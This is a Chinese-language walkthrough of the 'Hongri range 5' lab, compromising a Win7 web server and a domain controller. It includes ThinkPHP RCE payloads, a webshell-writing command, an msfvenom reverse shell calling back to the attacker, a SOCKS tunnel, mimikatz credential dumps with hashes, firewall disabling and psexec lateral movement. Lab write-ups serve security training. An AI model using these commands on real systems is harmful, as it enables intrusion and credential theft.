红日靶场5

目录

前言

外网渗透

信息收集

1、arp探测

2、nmap

3、nikto

4、whatweb

5、gobuster

6、dirsearch

漏洞探测

ThinKPHP漏洞

漏洞利用

get shell

内网渗透

信息收集

CS 启动!

CS连接

CS信息收集

1、hashdump

2、猕猴桃

3、端口扫描

MSF启动!

MSF木马生成

MSF监听模块

MSF信息收集

1、添加内网路由

2、引入本地流量

3、密码抓取

4、关闭防火墙

5、get win7

6、get 域控

前言

红日靶场5_第1张图片


靶机一共分为两台,一台win7模拟web服务器,一台windows 2008 用来模拟内网环境。win7可被当作跳板机。

win7
账号:sun\heart
密码:123.com
win7内域用户登录
账号:Administrator
密码:dc123.com


windows 2008 server
账号:sun\admin 2020.com
密码:2020.com


在打靶之前要先把win7 c盘内的phpstudy打开!

win7是双网卡,只需要将自己的nat网卡网段改为同win7一样的网段即可,也就是135!

外网渗透

信息收集

1、arp探测

┌──(root㉿ru)-[~/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.135.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.135.1   00:50:56:c0:00:08       VMware, Inc.
192.168.135.2   00:50:56:ec:d1:ca       VMware, Inc.
192.168.135.150 00:0c:29:ce:6e:f7       VMware, Inc.
192.168.135.254 00:50:56:e7:9c:50       VMware, Inc.

5 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.432 seconds (105.26 hosts/sec). 4 responded

2、nmap

端口探测

┌──(root㉿ru)-[~/kali]
└─# nmap -p- 192.168.135.150 --min-rate 10000 -oA port
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 09:53 CST
Nmap scan report for 192.168.135.150
Host is up (0.00061s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:CE:6E:F7 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.45 seconds


信息收集

┌──(root㉿ru)-[~/kali]
└─# nmap -sC -sV -sT -T5 -O -A -p 80,3306 192.168.135.150 --min-rate 10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-09 10:11 CST
Nmap scan report for 192.168.135.150
Host is up (0.00054s latency).

PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.5.38)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:CE:6E:F7 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 8.1 R1 (96%), Microsoft Windows Phone 7.5 or 8.0 (96%), Microsoft Windows Embedded Standard 7 (96%), Microsoft Windows Server 2008 or 2008 Beta 3 (92%), Microsoft Windows Server 2008 R2 or Windows 8.1 (92%), Microsoft Windows 7 Professional or Windows 8 (92%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (92%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (92%), Microsoft Windows 7 (90%), Microsoft Windows Server 2008 SP1 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.54 ms 192.168.135.150

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 157.56 seconds


3、nikto

┌──(root㉿ru)-[~/kali]
└─# nikto -h 192.168.135.150
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.135.150
+ Target Hostname:    192.168.135.150
+ Target Port:        80
+ Start Time:         2024-01-09 10:14:52 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
+ /: Retrieved x-powered-by header: PHP/5.5.38.
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OpenSSL/1.0.2j appears to be outdated (current is at least 3.0.7). OpenSSL 1.1.1s is current for the 1.x branch and will be supported until Nov 11 2023.
+ Apache/2.4.23 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.5.38 appears to be outdated (current is at least 8.1.5), PHP 7.4.28 for the 7.4 branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /: HTTP TRACE method is active which suggests the host is vulnerable to XST. See: https://owasp.org/www-community/attacks/Cross_Site_Tracing
+ PHP/5.5 - PHP 3/4/5 and 7.0 are End of Life products without support.

4、whatweb

┌──(root㉿ru)-[~/kali]
└─# whatweb -v http://192.168.135.150
WhatWeb report for http://192.168.135.150
Status    : 200 OK
Title     : 
IP        : 192.168.135.150
Country   : RESERVED, ZZ

Summary   : Apache[2.4.23], HTTPServer[Windows (32 bit)][Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38], OpenSSL[1.0.2j], PHP[5.5.38], Script[text/javascript], X-Powered-By[PHP/5.5.38]

Detected Plugins:
[ Apache ]
        The Apache HTTP Server Project is an effort to develop and
        maintain an open-source HTTP server for modern operating
        systems including UNIX and Windows NT. The goal of this
        project is to provide a secure, efficient and extensible
        server that provides HTTP services in sync with the current
        HTTP standards.

        Version      : 2.4.23 (from HTTP Server Header)
        Google Dorks: (3)
        Website     : http://httpd.apache.org/

[ HTTPServer ]
        HTTP server header string. This plugin also attempts to
        identify the operating system from the server header.

        OS           : Windows (32 bit)
        String       : Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38 (from server string)

[ OpenSSL ]
        The OpenSSL Project is a collaborative effort to develop a
        robust, commercial-grade, full-featured, and Open Source
        toolkit implementing the Secure Sockets Layer (SSL v2/v3)
        and Transport Layer Security (TLS v1) protocols as well as
        a full-strength general purpose cryptography library.

        Version      : 1.0.2j
        Website     : http://www.openssl.org/

[ PHP ]
        PHP is a widely-used general-purpose scripting language
        that is especially suited for Web development and can be
        embedded into HTML. This plugin identifies PHP errors,
        modules and versions and extracts the local file path and
        username if present.

        Version      : 5.5.38
        Version      : 5.5.38
        Google Dorks: (2)
        Website     : http://www.php.net/

[ Script ]
        This plugin detects instances of script HTML elements and
        returns the script language/type.

        String       : text/javascript

[ X-Powered-By ]
        X-Powered-By HTTP header

        String       : PHP/5.5.38 (from x-powered-by string)

HTTP Headers:
        HTTP/1.1 200 OK
        Date: Tue, 09 Jan 2024 02:13:06 GMT
        Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.5.38
        X-Powered-By: PHP/5.5.38
        Content-Length: 931
        Connection: close
        Content-Type: text/html; charset=utf-8

5、gobuster

┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.135.150 -x php,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.135.150
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index                (Status: 200) [Size: 931]
/index.php            (Status: 200) [Size: 931]
/0                    (Status: 200) [Size: 931]
/static               (Status: 301) [Size: 238] [--> http://192.168.135.150/static/]
/add.php              (Status: 200) [Size: 1643]
/Index                (Status: 200) [Size: 931]
/Index.php            (Status: 200) [Size: 931]
/robots.txt           (Status: 200) [Size: 24]
/captcha              (Status: 200) [Size: 1674]
/%20                  (Status: 403) [Size: 210]
/INDEX                (Status: 200) [Size: 931]
/INDEX.php            (Status: 200) [Size: 931]
/Add.php              (Status: 200) [Size: 1643]
===============================================================
Finished
===============================================================

6、dirsearch

┌──(root㉿ru)-[~/kali]
└─# dirsearch -u http://192.168.135.150 -e* -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz
HTTP method: GET | Threads: 25 | Wordlist size: 14594

Output File: /root/kali/reports/http_192.168.135.150/_24-01-09_10-16-21.txt

Target: http://192.168.135.150/

[10:16:21] Starting:
[10:16:59] 404 -  236B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:17:02] 404 -  205B  - /a%5c.aspx
[10:17:10] 200 -    2KB - /add.php
[10:18:42] 200 -    1KB - /favicon.ico
[10:19:37] 200 -   24B  - /robots.txt
[10:19:48] 301 -  238B  - /static  ->  http://192.168.135.150/static/
[10:19:48] 301 -  240B  - /static..  ->  http://192.168.135.150/static../

Task Completed

漏洞探测

ThinKPHP漏洞

红日靶场5_第2张图片



当我们访问不存在的目录即可获取到框架的版本信息!

漏洞利用


利用searchsploit可以发现利用漏洞!5.0版本存在RCE漏洞!我们利用一下!

payload


┌──(root㉿ru)-[~/kali]
└─# searchsploit -m 46150.txt
  Exploit: ThinkPHP 5.X - Remote Command Execution
      URL: https://www.exploit-db.com/exploits/46150
     Path: /usr/share/exploitdb/exploits/php/webapps/46150.txt
    Codes: N/A
 Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /root/kali/46150.txt



┌──(root㉿ru)-[~/kali]
└─# cat 46150.txt
# Exploit Title: thinkphp 5.X RCE
# Date: 2019-1-14
# Exploit Author: vr_system
# Vendor Homepage: http://www.thinkphp.cn/
# Software Link: http://www.thinkphp.cn/down.html
# Version: 5.x
# Tested on: windows 7/10
# CVE : None

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

1、https://blog.thinkphp.cn/869075
2、https://blog.thinkphp.cn/910675

POC:

thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5
5、http://127.0.0.1/tp5/public/?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

thinkphp 5.0.21
6、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
7、http://localhost/thinkphp_5.0.21/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

thinkphp 5.1.*
8、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=phpinfo&data=1
9、http://url/to/thinkphp5.1.29/?s=index/\think\Request/input&filter=system&data=cmd
10、http://url/to/thinkphp5.1.29/?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
11、http://url/to/thinkphp5.1.29/?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
12、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
13、http://url/to/thinkphp5.1.29/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
14、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
15、http://url/to/thinkphp5.1.29/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

未知版本
16、?s=index/\think\module/action/param1/${@phpinfo()}
17、?s=index/\think\Module/Action/Param/${@phpinfo()}
18、?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
19、index.php?s=/home/article/view_recent/name/1'
header = "X-Forwarded-For:1') and extractvalue(1, concat(0x5c,(select md5(233))))#"
20、index.php?s=/home/shopcart/getPricetotal/tag/1%27
21、index.php?s=/home/shopcart/getpriceNum/id/1%27
22、index.php?s=/home/user/cut/id/1%27
23、index.php?s=/home/service/index/id/1%27
24、index.php?s=/home/pay/chongzhi/orderid/1%27
25、index.php?s=/home/pay/index/orderid/1%27
26、index.php?s=/home/order/complete/id/1%27
27、index.php?s=/home/order/complete/id/1%27
28、index.php?s=/home/order/detail/id/1%27
29、index.php?s=/home/order/cancel/id/1%27
30、index.php?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+
31、POST /index.php?s=/home/user/checkcode/ HTTP/1.1
Content-Disposition: form-data; name="couponid"
1') union select sleep('''+str(sleep_time)+''')#

thinkphp 5.0.23(完整版)debug模式
32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx

thinkphp 5.0.23(完整版)
33、(post)public/index.php?s=captcha (data) _method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls -al

thhinkphp 5.0.10(完整版)
34、(post)public/index.php?s=index/index/index (data)s=whoami&_method=__construct&method&filter[]=system


框架的版本是5.0.22

我们利用此版本漏洞

thinkphp 5.0.22
1、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.username
2、http://192.168.1.1/thinkphp/public/?s=.|think\config/get&name=database.password
3、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
4、http://url/to/thinkphp_5.0.22/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1


红日靶场5_第3张图片


漏洞利用成功!说明存在此漏洞!我们可以写入木马然后利用蚁剑、冰蝎、菜刀连接!

get shell

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd

获取当前路径!

红日靶场5_第4张图片


paylaod

echo "" > C:\phpStudy\PHPTutorial\WWW\public\shell.php

把木马写到当前路径下的shell.php文件!

完整payload
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20%22%3C?php%20@eval($_POST[%27shell%27]);?%3E%22%20%3E%20C:\phpStudy\PHPTutorial\WWW\public\shell.php

红日靶场5_第5张图片


红日靶场5_第6张图片


内网渗透

信息收集

红日靶场5_第7张图片


主机是win7

外网主机IP:192.168.135.150
内网IP:192.168.138.136

那么内网网段就是138

DNS是sun.com,DNS服务器的地址是:192.168.138.138

红日靶场5_第8张图片


使用arp来查看当前网口的ip地址

可以发现138网段内还有内一个ip地址,那么这个IP地址也就是另一台内网主机了!

红日靶场5_第9张图片


 尝试ping DNS
 
 回显的地址就是域控主机,也就是内网中另一台主机,IP是:192.168.138.138


红日靶场5_第10张图片


信息收集的差不多就可以进行下一步了!这里有两种思路!

1、使用CS生成木马-监听-拿到shell

2、使用msf生成木马--监听--拿到shell

CS 启动!

CS连接

红日靶场5_第11张图片


红日靶场5_第12张图片


红日靶场5_第13张图片


生成一个windows木马文件!

红日靶场5_第14张图片


直接拖进去即可!

然后直接在命令行中启动即可!

红日靶场5_第15张图片


cs就上线成功了!

CS信息收集

红日靶场5_第16张图片


记得把会话返回时间改为0

红日靶场5_第17张图片


红日靶场5_第18张图片


  成功拿到system最高权限啦!

怎么拿到密码呢

1、使用cs自带的hashdump

2、使用cs自带的猕猴桃 或者直接运行 logonpasswords 也是可以的!

1、hashdump


红日靶场5_第19张图片


2、猕猴桃

红日靶场5_第20张图片


红日靶场5_第21张图片


得到外网主机的账号密码

leo  123.com

Administrator  dc123.com   域管理员的账号

域是SUN

3、端口扫描

红日靶场5_第22张图片


红日靶场5_第23张图片


这样利用cs就能获取到内网主机的端口了!

MSF启动!

MSF木马生成

┌──(root㉿ru)-[~/kali]
└─# msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.135.128 lport=1111 -f exe -o 1.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: 1.exe


MSF监听模块

msf6 exploit(multi/script/web_delivery) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interfac
                                     e may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.135.128
lhost => 192.168.135.128
msf6 exploit(multi/handler) > set lport 1111
lport => 1111
msf6 exploit(multi/handler) > run

生成的木马端口和ip一定要和监听端一样哈!

红日靶场5_第24张图片


上传到蚁剑并运行即可反弹shell!

红日靶场5_第25张图片


MSF信息收集

1、添加内网路由
前面我们信息收集到,内网ip网段为 192.168.138.0/24

红日靶场5_第26张图片


run autoroute -s 192.168.138.0/24   添加内网路由

run autoroute -p   查看路由


2、引入本地流量
到这一步,我们就可以先把本地kali流量通过内网穿透工具带到内网!

我这里使用ew工具,也可以使用frpc、aliver等!

红日靶场5_第27张图片


红日靶场5_第28张图片


上传蚁剑 --  运行  -- 建立连接成功


./ew_for_linux64 -s rcsocks -l 2222 -e 3333
ew_for_win.exe -s rssocks -d 192.168.135.128 -e 3333

rcsocks、rssocks用于反向连接

-l:指定本地监听端口
-e:指定转发流量端口
-d:指定连接主机


3、密码抓取
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.


meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).


meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username       Domain  LM                                NTLM                              SHA1
--------       ------  --                                ----                              ----
Administrator  SUN     c8c42d085b5e3da2e9260223765451f1  e8bea972b3549868cecd667a64a6ac46  3688af445e35efd8a4d4e0a9eb90b754a2f3a4ee
WIN7$          SUN                                       ad1f7aa2324f0629cc1dd6c9b8321924  38796bed48c38b20b659bf91ccf8a9f8c2ef57ee
leo            SUN     b73a13e9b7832a35aad3b435b51404ee  afffeba176210fad4628f0524bfe1942  fa83a92197d9896cb41463b7a917528b4009c650

wdigest credentials
===================

Username       Domain  Password
--------       ------  --------
(null)         (null)  (null)
Administrator  SUN     dc123.com
WIN7$          SUN     8a ea 8b 0d 3e c9 83 64 9c 07 24 92 77 40 3f f0 5a bd e0 6f a2 0c ee 22 03 58 02 a4 20 a7 8f fa 8b 55 27 1d b3 a8 ac 4d 67 9c 80 a7 cd 99 8a 09 12 38 3f fd 59 54 77 24 60
                        a0 02 e7 e0 df c0 56 eb 12 fd 7a 80 af 92 2f 88 c7 8c 5c 67 ee 81 68 bd a9 02 ee a9 b4 97 db 52 5d 1e 23 95 e8 94 e3 51 9c 79 81 d4 9f 30 0e 29 0d be 3d 29 95 13 cc f8 f
                       e 97 0e 6c 3e bc 36 98 99 b7 66 7e 9d 98 af d0 e9 f4 14 86 d9 d0 8d 6a 48 e0 6d d6 9d 63 5e 46 b5 e9 de f5 45 05 a3 ea 60 0e de f8 9e 38 e1 53 e3 6c 4b f4 dc 8b 08 31 af
                       b3 b2 30 fb b3 32 78 ba b1 7a 2a 2d 11 f0 67 ee 4a 1a 45 81 53 63 15 b7 4d 78 8c a8 31 c6 51 93 9b 5a c9 0e db 13 f0 dd 39 52 f2 2a 65 37 00 56 ec a7 a0 fe ef 9d 89 46 4f
                        cf f2 9f 8a 90 96 74 ea e9 28 fa 49 ed
leo            SUN     123.com

tspkg credentials
=================

Username       Domain  Password
--------       ------  --------
Administrator  SUN     dc123.com
leo            SUN     123.com

kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  SUN.COM  dc123.com
leo            SUN.COM  123.com
win7$          SUN.COM  8a ea 8b 0d 3e c9 83 64 9c 07 24 92 77 40 3f f0 5a bd e0 6f a2 0c ee 22 03 58 02 a4 20 a7 8f fa 8b 55 27 1d b3 a8 ac 4d 67 9c 80 a7 cd 99 8a 09 12 38 3f fd 59 54 77 24 6
                        0 a0 02 e7 e0 df c0 56 eb 12 fd 7a 80 af 92 2f 88 c7 8c 5c 67 ee 81 68 bd a9 02 ee a9 b4 97 db 52 5d 1e 23 95 e8 94 e3 51 9c 79 81 d4 9f 30 0e 29 0d be 3d 29 95 13 cc f8
                         fe 97 0e 6c 3e bc 36 98 99 b7 66 7e 9d 98 af d0 e9 f4 14 86 d9 d0 8d 6a 48 e0 6d d6 9d 63 5e 46 b5 e9 de f5 45 05 a3 ea 60 0e de f8 9e 38 e1 53 e3 6c 4b f4 dc 8b 08 31
                        af b3 b2 30 fb b3 32 78 ba b1 7a 2a 2d 11 f0 67 ee 4a 1a 45 81 53 63 15 b7 4d 78 8c a8 31 c6 51 93 9b 5a c9 0e db 13 f0 dd 39 52 f2 2a 65 37 00 56 ec a7 a0 fe ef 9d 89 4
                        6 4f cf f2 9f 8a 90 96 74 ea e9 28 fa 49 ed


load kiwi  --  getsystem   --  creds_all

得到域管理员以及普通用户的账号以及密码:

win7:
Administrator     dc123.com 
leo               123.com


4、关闭防火墙
netsh advfirewall show allprofiles   查看防火墙的状态

netsh advfirewall set allprofiles state off   关闭防护墙


红日靶场5_第29张图片


5、get win7
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

参数为1:开启服务
参数为0:关闭服务



登录成功!

6、get 域控
我们使用Psexec登录域控

在此之前,我们要先关闭防火墙


C:\phpStudy\PHPTutorial\WWW\public>net use \\192.168.138.138\ipc$ "1qaz@WSX" /user:"Administrator"
net use \\192.168.138.138\ipc$ "1qaz@WSX" /user:"Administrator"
The command completed successfully.


C:\phpStudy\PHPTutorial\WWW\public>sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
sc \\192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
[SC] CreateService SUCCESS

C:\phpStudy\PHPTutorial\WWW\public>sc \\192.168.138.138 start unablefirewall
sc \\192.168.138.138 start unablefirewall
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.


C:\phpStudy\PHPTutorial\WWW\public>



使用psexec模块


msf6 exploit(windows/smb/psexec) > options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.138.138  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             sun              no        The Windows domain to use for authentication
   SMBPass               1qaz@WSX         no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               administrator    no        The username to authenticate as


Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT     4444             yes       The listen port
   RHOST     192.168.138.138  no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > setg proxies socks5:127.0.0.1:2222
proxies => socks5:127.0.0.1:2222


事先开好代理,并把流量带到win7,在使用psexec时,开启全局代理!


meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:65dc23a67f31503698981f2665f9d858:::
admin:1000:aad3b435b51404eeaad3b435b51404ee:161cff084477fe596a5db81874498a24:::
leo:1110:aad3b435b51404eeaad3b435b51404ee:afffeba176210fad4628f0524bfe1942:::
DC$:1001:aad3b435b51404eeaad3b435b51404ee:4062133d1d6015f7f64f9ee1c118eff0:::
WIN7$:1105:aad3b435b51404eeaad3b435b51404ee:ad1f7aa2324f0629cc1dd6c9b8321924:::

ok!拿到两台主机meterpreter之后就算完成靶机的渗透了!

权限维持,可以搜一下教程!也很简单!

你可能感兴趣的:(红日靶场打靶练习,网络安全)